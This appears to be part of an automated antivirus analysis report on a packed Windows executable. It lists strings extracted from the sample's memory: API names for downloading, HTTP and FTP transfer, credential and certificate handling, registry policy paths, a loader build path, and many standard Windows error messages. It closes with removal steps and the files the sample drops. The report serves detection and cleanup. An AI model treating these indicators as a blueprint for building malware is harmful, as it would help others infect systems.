dhcpcsvc.dll
devmgr.dll
ddraw.dll
d3dxof.dll
cscdll.dll
cryptui.dll
crypt32.dll
credui.dll
comdlg32.dll
comctl32.dll
certcli.dll
cdfview.dll
cabinet.dll
browseui.dll
authz.dll
apphelp.dll
advpack.dll
activeds.dll
WinStationIsHelpAssistantSession
WinStationEnumerate_IndexedW
|UnlockUrlCacheEntryStream
UnlockUrlCacheEntryFileW
UnlockUrlCacheEntryFileA
SetUrlCacheEntryInfoW
SetUrlCacheEntryGroupW
SetUrlCacheConfigInfoA
RetrieveUrlCacheEntryStreamW
RetrieveUrlCacheEntryFileW
RetrieveUrlCacheEntryFileA
RegisterUrlCacheNotification
ReadUrlCacheEntryStream
LoadUrlCacheContent
IsHostInProxyBypassList
InternetShowSecurityInfoByURLW
InternetOpenUrlW
InternetOpenUrlA
InternetCreateUrlW
InternetCreateUrlA
InternetCrackUrlW
InternetCrackUrlA
InternetCombineUrlW
InternetCanonicalizeUrlW
InternetCanonicalizeUrlA
HttpSendRequestW
HttpSendRequestExW
HttpSendRequestExA
HttpSendRequestA
HttpQueryInfoW
HttpQueryInfoA
HttpOpenRequestW
HttpOpenRequestA
HttpEndRequestW
HttpEndRequestA
HttpAddRequestHeadersW
HttpAddRequestHeadersA
GetUrlCacheEntryInfoW
GetUrlCacheEntryInfoExW
GetUrlCacheEntryInfoExA
GetUrlCacheEntryInfoA
GetUrlCacheConfigInfoW
GetUrlCacheConfigInfoA
FtpSetCurrentDirectoryW
FtpSetCurrentDirectoryA
FtpRenameFileA
FtpRemoveDirectoryA
FtpPutFileEx
FtpOpenFileW
FtpOpenFileA
FtpGetFileSize
FtpGetFileEx
FtpGetCurrentDirectoryW
FtpGetCurrentDirectoryA
FtpFindFirstFileW
FtpFindFirstFileA
FtpDeleteFileW
FtpDeleteFileA
FtpCreateDirectoryW
FtpCreateDirectoryA
FtpCommandA
FreeUrlCacheSpaceW
FindNextUrlCacheEntryW
FindNextUrlCacheEntryExW
FindNextUrlCacheEntryExA
FindNextUrlCacheEntryA
FindNextUrlCacheContainerW
FindNextUrlCacheContainerA
FindFirstUrlCacheEntryW
FindFirstUrlCacheEntryExW
FindFirstUrlCacheEntryExA
FindFirstUrlCacheEntryA
FindFirstUrlCacheContainerW
FindFirstUrlCacheContainerA
FindCloseUrlCache
DeleteUrlCacheGroup
DeleteUrlCacheEntryW
DeleteUrlCacheEntryA
DeleteUrlCacheContainerA
CreateUrlCacheGroup
CreateUrlCacheEntryW
CreateUrlCacheEntryA
CreateUrlCacheContainerW
CreateUrlCacheContainerA
CommitUrlCacheEntryW
CommitUrlCacheEntryA
|WinHttpSetTimeouts
WinHttpSetStatusCallback
WinHttpSendRequest
WinHttpReceiveResponse
WinHttpQueryHeaders
WinHttpOpenRequest
WinHttpOpen
WinHttpCrackUrl
WinHttpConnect
WinHttpCloseHandle
|UrlMkSetSessionOption
UrlMkGetSessionOption
URLOpenBlockingStreamW
URLDownloadToFileW
URLDownloadToCacheFileW
IsValidURL
GetMarkOfTheWeb
CreateURLMoniker
CoInternetParseUrl
CoInternetIsFeatureEnabledForUrl
CoInternetGetSecurityUrl
CoInternetCombineUrl
SceSetupUpdateSecurityKey
RasShareConnection
RasIsSharedConnection
DsMakePasswordCredentialsW
DsFreePasswordCredentials
|NetpUpgradePreNT5JoinInfo
NetUserChangePassword
NetUnjoinDomain
NetJoinDomain
NetGetJoinInformation
|SpcGetCertFromKey
GetCryptProvFromCert
FreeCryptProvFromCert
|ShowModelessHTMLDialog
MPRUI_DoPasswordDialog
PRShowSaveFromMsginaW
PRShowRestoreFromMsginaW
KRShowKeyMgr
GetUdpStatistics
GetTcpStatistics
|IcfGetOperationalMode
SetViewportOrgEx
SetViewportExtEx
JetMakeKey
CryptUIDlgViewCertificateW
CryptVerifyCertificateSignature
CryptSignAndEncodeCertificate
CryptMsgGetParam
CryptMsgGetAndVerifySigner
CryptMsgClose
CryptImportPublicKeyInfoEx
CryptImportPublicKeyInfo
CryptHashPublicKeyInfo
CryptExportPublicKeyInfo
CertVerifySubjectCertificateContext
CertVerifyCertificateChainPolicy
CertStrToNameW
CertSetCertificateContextProperty
CertRegisterPhysicalStore
CertRDNValueToStrW
CertOpenSystemStoreW
CertOpenStore
CertNameToStrW
CertGetPublicKeyLength
CertGetNameStringW
CertGetIssuerCertificateFromStore
CertGetEnhancedKeyUsage
CertGetCertificateContextProperty
CertGetCertificateChain
CertFreeCertificateContext
CertFreeCertificateChain
CertFreeCTLContext
CertFindSubjectInCTL
CertFindExtension
CertFindCertificateInStore
CertFindCTLInStore
CertEnumCertificatesInStore
CertDuplicateCertificateContext
CertDuplicateCTLContext
CertDeleteCertificateFromStore
CertCreateCertificateContext
CertCreateCTLContext
CertControlStore
CertCompareCertificateName
CertCloseStore
CertAddCertificateContextToStore
CredUICmdLinePromptForCredentialsW
SSSSh
PSSSSSSh
t.PSW
mem16.dll
ImpersonateNamedPipeClient
VWSSh
t.hlt
hypertrm.exe"
hypertrm.exe
.exr (exception record)
.cxr (context record)
serialui.dll
mekr386.exe
PVWSSh
SXS: %s() BaseDllMapResourceIdA failed
-. "%ls" %ld
(LRU) (Exe Name) (FileSize)
Total Entries = 0x%x
xpsp2res.dll
xpsp3res.dll
?456789:;<=
!"#$%&'()* ,-./0123
|CertAutoEnrollment
VSSHP
NtQueryValueKey
NtOpenKey
NtFlushKey
NtSetValueKey
NtCreateKey
NtEnumerateKey
NtEnumerateValueKey
RtlFormatCurrentUserKeyPath
NtQueryKey
NtDeleteValueKey
RtlGetProcessHeaps
NtCreateNamedPipeFile
NtSetThreadExecutionState
LdrQueryImageFileExecutionOptions
NtDelayExecution
NtYieldExecution
kernel32.pdb
sShortDate
win.ini
.Config
.Manifest
\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers
\Windows
\NLS\NlsSectionSortkey
\system32\Apphelp.dll
\Registry\MACHINE\System\CurrentControlSet\Control\Session Manager\AppCertDlls
\Registry\Machine\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
ADVAPI32.DLL
\\.\MountPointManager
\Registry\Machine\System\CurrentControlSet\Services\Tcpip\Parameters
hotkey.%u %s
wowexec.pif
cmd /c
hotkey.
setup.exe
\DosDevices\pipe\
\\.\pipe\
\REGISTRY\USER\.DEFAULT
WUSER32.DLL
~RF%4x.TMP
netmsg.dll
pipe\
c:\temp\
EmbdTrst.DLL
\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
%ws%u\DosDevices\%ws
WINDOWS
\\?\GLOBALROOT
Application.Manifest
"/\[]:|<> =;,?
\REGISTRY\Machine\Software\Microsoft\Windows NT\currentVersion\Time Zones
\Registry\Machine\Software\Policies\Microsoft\Windows\System
AppCertDlls
tsappcmp.dll
\inifile.upd
t\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\AeDebug
DRMHeader.SubscriptionContentID
DRMHeader.ContentDistributor
DRMHeader.SECURITYVERSION
DRMHeader.CID
DRMHeader.LAINFO
DRMHeader.KID
LicenseStateData.Transfer.NONSDMI
LicenseStateData.Transfer.SDMI
LicenseStateData.Print.redbook
LicenseStateData.Play
ActionAllowed.Backup
ActionAllowed.Transfer.NONSDMI
ActionAllowed.Transfer.SDMI
ActionAllowed.Print.redbook
ActionAllowed.Play
BaseLAURL
Transfer.NONSDMI
Transfer.SDMI
Print.redbook
Software\Microsoft\Windows NT\CurrentVersion\Time Zones
TimeZoneKeyName
PendingFileRenameOperations%d
PendingFileRenameOperations
%s\system32\
\system32\faultrep.dll
mwowcmdline
cmdline
CONSOLE.DLL
conime.exe
\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Console
\INF\INTL.INF
DNSAPI.DLL
cfgmgr32.dll
The operation completed successfully.
Not enough storage is available to complete this operation.
The process cannot access the file because another process has locked a portion of the file.
The request is not supported.
Windows cannot find the network path. Verify that the network path is correct and the destination computer is not busy or turned off. If Windows still cannot find the network path, contact your network administrator.
The specified server cannot perform the requested operation.
The specified network password is not correct.
The pipe has been ended.
The system does not support the command requested.
This function is not supported on this system.
The data area passed to a system call is too small.
Attempt to use a file handle to an open disk partition for an operation other than raw disk I/O.
A JOIN or SUBST command cannot be used for a drive that contains previously joined drives.
An attempt was made to use a JOIN or SUBST command on a drive that has already been joined.
An attempt was made to use a JOIN or SUBST command on a drive that has already been substituted.
The system tried to delete the JOIN of a drive that is not joined.
The system tried to join a drive to a directory on a joined drive.
The system tried to join a drive to a directory on a substituted drive.
The system tried to SUBST a drive to a directory on a joined drive.
The system cannot perform a JOIN or SUBST at this time.
The system cannot join or substitute a drive to or for a directory on the same drive.
An attempt was made to join or substitute a drive for which a directory on the drive is the target of a previous substitute.
System trace information was not specified in your CONFIG.SYS file, or tracing is disallowed.
DosMuxSemWait did not execute; too many semaphores are already set.
The file system does not support atomic changes to the lock type.
The operating system cannot run %1.
The flag passed is not correct.
The operating system cannot run this application program.
The operating system is not presently configured to run this application.
The pipe state is invalid.
All pipe instances are busy.
The pipe is being closed.
No process is on the other end of the pipe.
The wait operation timed out.
The mounted file system does not support extended attributes.
The volume is too fragmented to complete this operation.
There is a process on other end of the pipe.
Waiting for a process to open the other end of the pipe.
The I/O operation has been aborted because of either a thread exit or an application request.
Overlapped I/O operation is in progress.
Error performing inpage operation.
The requested operation cannot be performed in full-screen mode.
The configuration registry key is invalid.
The configuration registry key could not be opened.
The configuration registry key could not be read.
The configuration registry key could not be written.
An I/O operation initiated by the registry failed unrecoverably. The registry could not read in, or write out, or flush, one of the files that contain the system's image of the registry.
Illegal operation attempted on a registry key that has been marked for deletion.
Cannot create a symbolic link in a registry key that already has subkeys or values.
Cannot create a stable subkey under a volatile parent key.
The account name is invalid or does not exist, or the password is invalid for the account name specified.
The executable program that this service is configured to run in does not implement the service.
A serial I/O operation was completed by another write to the serial port.
A serial I/O operation completed because the timeout period expired.
The floppy disk controller reported an error that is not recognized by the floppy disk driver.
While accessing the hard disk, a recalibrate operation failed, even after retries.
While accessing the hard disk, a disk operation failed even after retries.
An attempt was made to create more links on a file than the file system supports.
The specified program requires a newer version of Windows.
The specified program is not a Windows or MS-DOS program.
The specified program was written for an earlier version of Windows.
No application is associated with the specified file for this operation.
The message can be used only with synchronous operations.
The device has indicated that cleaning is required before further operations are attempted.
There was no match for the specified key in the index.
The point passed to GetMouseMovePoints is not in the buffer.
The format of the specified password is invalid.
The operation was canceled by the user.
The requested operation cannot be performed on a file with a user-mapped section open.
The network transport endpoint already has an address associated with it.
An operation was attempted on a nonexistent network connection.
An invalid operation was attempted on an active network connection.
The network location cannot be reached. For information about network troubleshooting, see Windows Help.
No service is operating at the destination network endpoint on the remote system.
The operation could not be completed. A retry should be performed.
The network address could not be used for the operation requested.
The operation being requested was not performed because the user has not been authenticated.
The operation being requested was not performed because the user has not logged on to the network.
An attempt was made to perform an initialization operation when initialization has already been completed.
This operation is supported only when you are connected to the server.
This operation is not supported on a Microsoft Small Business Server
The remote system is not available. For information about network troubleshooting, see Windows Help.
Windows cannot open this program because it has been prevented by a software restriction policy. For more information, open Event Viewer or contact your system administrator.
KDC certificate during smartcard logon.
The smartcard certificate used for authentication has been revoked.
An untrusted certificate authority was detected While processing the
smartcard certificate used for authentication. Please contact your system
The revocation status of the smartcard certificate used for
The smartcard certificate used for authentication was not trusted. Please
The smartcard certificate used for authentication has expired. Please
A dynamic link library (DLL) referenced a module that was neither a DLL nor the process's executable image.
No encryption key is available. A well-known encryption key was returned.
The password is too complex to be converted to a LAN Manager password. The LAN Manager password returned is a NULL string.
An attempt has been made to operate on an impersonation token by a thread that is not currently impersonating a client.
Unable to update the password. The value provided as the current password is incorrect.
Unable to update the password. The value provided for the new password contains values that are not allowed in passwords.
Unable to update the password. The value provided for the new password does not meet the length, complexity, or history requirement of the domain.
Logon failure: unknown user name or bad password.
Logon failure: user account restriction. Possible reasons are blank passwords not allowed, logon hour restrictions, or a policy restriction has been enforced.
Logon failure: the specified account password has expired.
Unable to perform a security operation on an object that has no associated security.
The security account manager (SAM) or local security authority (LSA) server was in the wrong state to perform the security operation.
The domain was in the wrong state to perform the security operation.
This operation is only allowed for the Primary Domain Controller of the domain.
Unable to complete the requested operation because of either a catastrophic media failure or a data structure corruption on the disk.
The logon session is not in a state that is consistent with the requested operation.
Unable to impersonate using a named pipe until data has been read from that pipe.
The transaction state of a registry subtree is incompatible with the requested operation.
Cannot perform this operation on built-in accounts.
Cannot perform this operation on this built-in special group.
Cannot perform this operation on this built-in special user.
A cross-encrypted password is necessary to change a user password.
A cross-encrypted password is necessary to change this user password.
There is no user session key for the specified logon session.
Mutual Authentication failed. The server's password is out of date at the domain controller.
This operation can not be performed on the current domain.
Hot key is already registered.
Class still has open windows.
Hot key is not registered.
This list box does not support tab stops.
Child windows cannot have menus.
All handles to windows in a multiple-window position structure must have the same parent.
The paging file is too small for this operation to complete.
Invalid keyboard layout handle.
This operation requires an interactive window station.
This operation returned because the timeout period expired.
The event log file has changed between read operations.
The Windows Installer Service could not be accessed. This can occur if you are running Windows in safe mode, or if the Windows Installer is not correctly installed. Contact your support personnel for assistance.
The configuration data for this product is corrupt. Contact your support personnel.
This installation package cannot be installed by the Windows Installer service. You must install a Windows service pack that contains a newer version of the Windows Installer service.
SQL query syntax invalid or unsupported.
This installation package could not be opened. Verify that the package exists and that you can access it, or contact the application vendor to verify that this is a valid Windows Installer package.
This installation package could not be opened. Contact the application vendor to verify that this is a valid Windows Installer package.
There was an error starting the Windows Installer service user interface. Contact your support personnel.
The language of this installation package is not supported by your system.
Function could not be executed.
Function failed during execution.
Data of this type is not supported.
The Windows Installer service failed to start. Contact your support personnel.
This installation package is not supported by this processor type. Contact your product vendor.
This patch package could not be opened. Verify that the patch package exists and that you can access it, or contact the application vendor to verify that this is a valid Windows Installer patch package.
This patch package could not be opened. Contact the application vendor to verify that this is a valid Windows Installer patch package.
This patch package cannot be processed by the Windows Installer service. You must install a Windows service pack that contains a newer version of the Windows Installer service.
Invalid command line argument. Consult the Windows Installer SDK for detailed command line help.
The requested operation completed successfully. The system will be restarted so the changes can take effect.
The upgrade patch cannot be installed by the Windows Installer service because the program to be upgraded may be missing, or the upgrade patch may update a different version of the program. Verify that the program to be upgraded exists on your computer an
The RPC protocol sequence is not supported.
Not enough resources are available to complete this operation.
The RPC server is too busy to complete this operation.
The remote procedure call failed and did not execute.
The transfer syntax is not supported by the RPC server.
The universal unique identifier (UUID) type is not supported.
The name syntax is not supported.
The server endpoint cannot perform the operation.
No interfaces have been exported.
There is nothing to unexport.
The requested operation is not supported.
A floating-point operation at the RPC server caused a division by zero.
A null context handle was passed from the client to the host during a remote procedure call.
The binding handles passed to a remote procedure call do not match.
A null reference pointer was passed to the stub.
The supplied user buffer is not valid for the requested operation.
The specified port is unknown.
The requested authentication level is not supported.
The error specified is not a valid Windows RPC error code.
Invalid operation on the encoding/decoding handle.
The RPC pipe object is invalid or corrupted.
An invalid operation was attempted on an RPC pipe object.
Unsupported RPC pipe version.
The user's password must be changed before logging on the first time.
The object exporter specified was not found.
Invalid asynchronous RPC call handle for this operation.
The RPC pipe object has already been closed.
The RPC call completed before all pipes were processed.
No more data is available from the RPC pipe.
Not all object UUIDs could be exported to the specified entry.
Interface could not be exported to the specified entry.
The window style or class attribute is invalid for this operation.
The requested metafile operation is not supported.
The requested transformation operation is not supported.
The requested clipping operation is not supported.
The network connection was made successfully, but the user had to be prompted for a password other than the one originally specified.
The requested operation is not allowed when there are jobs queued to the printer.
The requested operation is successful. Changes will not be effective until the system is rebooted.
The requested operation is successful. Changes will not be effective until the service is restarted.
The importation from the file failed.
The GUID passed was not recognized as valid by a WMI data provider.
The instance name passed was not recognized as valid by a WMI data provider.
The data item ID passed was not recognized as valid by a WMI data provider.
The medium currently exists in an offline library and must be online to perform this operation.
The operation cannot be performed on an offline library.
The library, drive, or media pool must be empty to perform this operation.
A resource required for this operation is disabled.
The drive cannot be cleaned or does not support cleaning.
The resource required for this operation does not exist.
The operation identifier is not valid.
The operator or administrator has refused the request.
The transport cannot access the medium.
Unable to retrieve status about the transport.
Cannot use the transport because it is already in use.
Unable to open or close the inject/eject port.
The media type cannot be removed from this library since at least one drive in the library reports it can support this media type.
The remote storage service is not operational at this time.
A cluster node is not available for this operation.
The operation could not be completed because the cluster group is not online.
The operation could not be completed because the cluster resource is online.
The group or resource is not in the correct state to perform the requested operation.
A cluster network is not available for this operation.
All cluster nodes must be running to perform this operation.
A node is in the process of joining the cluster.
A cluster join operation is not in progress.
This operation cannot be performed on the cluster resource as it the quorum resource. You may not bring the quorum resource offline or modify its possible owners list.
The cluster node is not ready to perform the requested operation.
The cluster join operation was aborted.
The cluster join operation failed due to incompatible software versions between the joining node and its sponsor.
The system configuration changed during the cluster join or form operation. The join or form operation was aborted.
The specified node does not support a resource of this type. This may be due to version inconsistencies or due to the absence of the resource DLL on this node.
The specified resource name is not supported by this resource DLL. This may be due to a bad (or changed) name supplied to the resource DLL.
The join operation failed because the cluster database sequence number has changed or is incompatible with the locker node. This may happen during a join operation if the cluster database was changing during the join.
The resource monitor will not allow the fail operation to be performed while the resource is in its current state. This may happen if the resource is in a pending state.
An operation was attempted that is incompatible with the current membership state of the node.
The join operation failed because the cluster instance ID of the joining node does not match the cluster instance ID of the sponsor node.
This computer cannot be made a member of a cluster because it does not have the correct version of Windows installed.
There are no EFS keys defined for the user.
The specified file is not in the defined EFS export format.
The server is not trusted for remote encryption operation.
Recovery policy configured for this system contains invalid recovery certificate.
The encryption algorithm used on the source file needs a bigger key buffer than the one on the destination file.
The disk partition does not support file encryption.
A registry key for event logging could not be created for this session.
A close operation is pending on the session.
The MODEM.INF file was not found.
The modem name was not found in MODEM.INF.
Transport driver error
The requested operation cannot be completed because the terminal connection is currently busy processing a connect, disconnect, reset, or delete operation.
An attempt has been made to connect to a session whose video mode is not supported by the current client.
DOS graphics mode is not supported.
The requested operation can be performed only on the system console.
Disconnecting the console session is not supported.
Reconnecting a disconnected session to the console is not supported.
The remote control of the console was terminated because the display mode was changed. Changing the display mode in a remote control session is not supported.
The requested operation could not be performed because the directory service is not the master for that type of operation.
The requested operation did not satisfy one or more constraints associated with the class of the object.
The directory service can perform the requested operation only on a leaf object.
The directory service cannot perform the requested operation on the RDN attribute of an object.
The requested cross-domain move operation could not be performed.
An operations error occurred.
The requested authentication method is not supported by the server.
The server does not support the requested critical extension.
The operation affects multiple DSAs
The server is not operational.
The specified method is not supported.
The specified control is not supported by the server.
The add replica operation cannot be performed. The naming context must be writable in order to create the replica.
The attribute specified in the operation is not present on the object.
Illegal modify operation. Some aspect of the modification is not permitted.
The operation must be performed at a master DSA.
The operation could not be performed because the object's parent is either uninstantiated or deleted.
The operation cannot be performed because child objects exist. This operation can only be performed on a leaf object.
The operation is out of scope.
The operation cannot continue because the object is in the process of being removed.
The operation can only be performed on an internal master DSA object.
Insufficient access rights to perform the operation.
The operation cannot be performed on a back link.
The operation could not be performed because the directory service is shutting down.
The requested FSMO operation failed. The current FSMO holder could not be contacted.
Subtree notifications are only supported on NC heads.
The requested delete operation could not be performed.
The global catalog verification failed. The global catalog is not available or does not support the operation. Some part of the directory is currently not available.
The replication operation failed because of a schema mismatch between the servers involved.
The operation cannot replace the hidden record.
This directory server is shutting down, and cannot take ownership of new floating single-master operation roles.
The directory service is missing mandatory configuration information, and is unable to determine the ownership of floating single-master operation roles.
The directory service was unable to transfer ownership of one or more floating single-master operation roles to other servers.
The replication operation failed.
An invalid parameter was specified for this replication operation.
The directory service is too busy to complete the replication operation at this time.
The distinguished name specified for this replication operation is invalid.
The naming context specified for this replication operation is invalid.
The distinguished name specified for this replication operation already exists.
The replication operation encountered a database inconsistency.
The server specified for this replication operation could not be contacted.
The replication operation encountered an object with an invalid instance type.
The replication operation failed to allocate memory.
The replication operation encountered an error with the mail system.
The replication operation encountered a database error.
The requested operation is not supported by this version of the directory service.
The replication operation failed due to a collision of object names.
The replication operation failed because a required parent object is missing.
The replication operation was preempted.
The replication operation was terminated because the system is shutting down.
The server specified for this replication operation was contacted, but that server was unable to contact an additional server needed to complete the operation.
The version of the Active Directory schema of the source forest is not compatible with the version of Active Directory on this computer. You must upgrade the operating system on a domain controller in the source forest before this computer can be added as a domain controller to that forest.
The requested operation requires a directory service, and none was available.
The requested search operation is only supported for base searches.
The schema update operation tried to add a backward link attribute that has no corresponding forward link.
Source and destination for the cross-domain move operation are identical. Caller should use local move operation instead of cross-domain move operation.
Another operation which requires exclusive access to the PDC FSMO is already in progress.
A cross-domain move operation failed such that two versions of the moved object exist - one each in the source and destination domains. The destination object needs to be removed to restore the system to a consistent state.
The directory cannot validate the proposed naming context name because it does not hold a replica of the naming context above the proposed naming context. Please ensure that the domain naming master role is held by a server that is configured as a global catalog server, and that the server is up to date with its replication partners. (Applies only to Windows 2000 Domain Naming masters)
The operation can not be performed because the server does not have an infrastructure container in the domain of interest.
The replica/child install failed to read the objectVersion attribute in the SCHEMA section of the file schema.ini in the system32 directory.
Only DSAs configured to be Global Catalog servers should be allowed to hold the Domain Naming Master FSMO role. (Applies only to Windows 2000 servers)
The DSA operation is unable to proceed because of a DNS lookup failure.
The object requested was not found, but an object with that key was found.
The syntax of the linked attribute being added is incorrect. Forward links can only have syntax 2.5.5.1, 2.5.5.7, and 2.5.5.14, and backlinks can only have syntax 2.5.5.1
Security Account Manager needs to get the boot password.
Security Account Manager needs to get the boot key from floppy disk.
The operation requires that destination domain auditing be enabled.
The operation couldn't locate a DC for the source domain.
The replication operation could not be completed due to a schema incompatibility.
The replication operation could not be completed due to a previous schema incompatibility.
The replication update could not be applied because either the source or the destination has not yet received information regarding a recent cross-domain move operation.
The requested operation can be performed only on a global catalog server.
The operation requires that source domain auditing be enabled.
A Filter was passed that uses constructed attributes.
Your computer could not be joined to the domain. You have exceeded the maximum number of computer accounts you are allowed to create in this domain. Contact your system administrator to have this limit reset or increased.
For security reasons, the operation must be run on the destination DC.
Critical Directory Service System objects cannot be deleted during tree delete operations. The tree delete may have been partially performed.
This version of Windows is too old to support the current directory forest behavior. You must upgrade the operating system on this server before it can become a domain controller in this forest.
This version of Windows is too old to support the current domain behavior. You must upgrade the operating system on this server before it can become a domain controller in this domain.
This version of Windows no longer supports the behavior version in use in this directory forest. You must advance the forest behavior version before this server can become a domain controller in the forest.
This version of Windows no longer supports the behavior version in use in this domain. You must advance the domain behavior version before this server can become a domain controller in the domain.
The version of Windows is incompatible with the behavior version of the domain or forest.
The sort order requested is not supported.
Unable to continue operation because multiple conflicting controls were used.
Rename or move operations on naming context heads or read-only objects are not allowed.
Move operations on objects in the schema naming context are not allowed.
The requested action is not supported on standard server.
The directory service cannot perform the requested operation because the servers
Operation not allowed on a disabled cross ref.
Schema update failed: Duplicate msDS-INtId. Retry the operation.
The remote create cross reference operation failed on the Domain Naming Master FSMO. The operation's error is in the extended data.
DNS request not supported by name server.
DNS operation refused.
DNS bad key.
Try DNS operation again later.
The operation requested is not permitted on a DNS root server.
Invalid operation for DNS zone.
The operation cannot be performed because this zone is shutdown.
TCP/IP network protocol not installed.
A blocking operation was interrupted by a call to WSACancelBlockingCall.
A non-blocking socket operation could not be completed immediately.
A blocking operation is currently executing.
An operation was attempted on a non-blocking socket that already had an operation in progress.
An operation was attempted on something that is not a socket.
A required address was omitted from an operation on a socket.
A protocol was specified in the socket function call that does not support the semantics of the socket type requested.
An unknown, invalid, or unsupported option or level was specified in a getsockopt or setsockopt call.
The support for the specified socket type does not exist in this address family.
The attempted operation is not supported for the type of object referenced.
Only one usage of each socket address (protocol/network address/port) is normally permitted.
A socket operation encountered a dead network.
A socket operation was attempted to an unreachable network.
The connection has been broken due to keep-alive activity detecting a failure while the operation was in progress.
An operation on a socket could not be performed because the system lacked sufficient buffer space or because a queue was full.
A socket operation failed because the destination host was down.
A socket operation was attempted to an unreachable host.

%original file name%.exe_1612_rwx_01E30000_0008E000:


%original file name%.exe_1612_rwx_01EC0000_00097000:


%original file name%.exe_1612_rwx_03990000_00001000:

.PR`WX

%original file name%.exe_1612_rwx_03A40000_00001000:

%8S^aZX

%original file name%.exe_1612_rwx_03A60000_00001000:

.faZX

%original file name%.exe_1612_rwx_03B10000_00001000:

1ZXZXZXhb(.IPR`

%original file name%.exe_1612_rwx_03BC0000_00001000:

.aP`PR

%original file name%.exe_1612_rwx_03E10000_00001000:

%XaZX

%original file name%.exe_1612_rwx_03EA0000_00001000:

%XaZX

%original file name%.exe_1612_rwx_03F80000_00001000:

s.Ya^`

%original file name%.exe_1612_rwx_04130000_00001000:

.zPR`PR
g~.zPRPR

%original file name%.exe_1612_rwx_04140000_00001000:

(r.zPR

%original file name%.exe_1612_rwx_04150000_00001000:

%XaZX

%original file name%.exe_1612_rwx_04420000_0003E000:

`.rsrc
L$(h%f
SSh0j
msctls_hotkey32
TVCLHotKey
THotKey
\skinh.she
}uo,x6l5k%x-l h
9p%s m)t4`#b
e"m?c&y1`Ð<
SetViewportOrgEx
SetViewportExtEx
SetWindowsHookExA
UnhookWindowsHookEx
EnumThreadWindows
EnumChildWindows
`c%US.4/
!#$<#$#=
.text
`.rdata
@.data
.rsrc
@.UPX0
`.UPX1
`.reloc
hJK.ZH
O.qt0
KERNEL32.DLL
COMCTL32.dll
GDI32.dll
MSIMG32.dll
MSVCRT.dll
MSVFW32.dll
USER32.dll
SkinH_EL.dll
1, 0, 6, 6
- Skin.dll

%original file name%.exe_1612_rwx_10000000_00018000:

`.rsrc
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
GetProcessWindowStation
USER32.DLL
operator
C:\Users\BLACK\Desktop\E_Loader 1.0\Release\E_Loader.pdb
E_Loader.dll
c:\%original file name%.exe
GetCPInfo
.text
`.rdata
@.data
.rsrc
@.reloc
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
KERNEL32.DLL
kernel32.dll
mscoree.dll


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Scan a system with an anti-rootkit tool.
  2. Terminate malicious process(es) (How to End a Process With the Task Manager): No processes have been created.
  3. Delete the original Packed file.
  4. Delete or disinfect the following files created/modified by the Packed:

    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\user[1].htm (12 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\user[1].htm (380 bytes)
    %WinDir%\qfx86.sys (188 bytes)
    %Documents and Settings%\%current user%\Desktop\ÓÎÐÐ.lnk (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  6. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
